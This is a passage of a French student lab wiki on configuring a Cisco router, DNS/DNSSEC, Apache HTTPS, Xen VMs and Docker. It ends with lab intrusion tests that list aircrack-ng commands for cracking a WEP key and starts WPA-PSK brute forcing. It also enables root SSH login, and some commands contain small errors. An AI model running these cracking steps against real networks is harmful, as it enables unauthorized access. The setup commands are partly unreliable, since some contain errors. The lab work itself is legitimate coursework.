   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
